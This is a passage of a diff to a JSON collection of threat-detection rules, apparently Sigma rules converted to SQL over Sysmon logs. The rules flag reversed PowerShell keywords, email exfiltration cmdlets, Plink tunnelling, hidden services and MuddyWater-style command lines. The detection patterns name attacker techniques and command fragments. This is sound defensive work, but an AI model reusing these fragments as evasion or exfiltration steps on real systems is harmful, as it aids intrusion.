"attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", - "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "status": "experimental", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.exfiltration" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", - "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", + "status": "test", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_plink_port_forwarding.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "status": "test", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of AnyDesk from a non-standard folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", - "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", + "status": "test", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.g0069" ], "falsepositives": [ - "Other DLLs with the same Imphash" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE 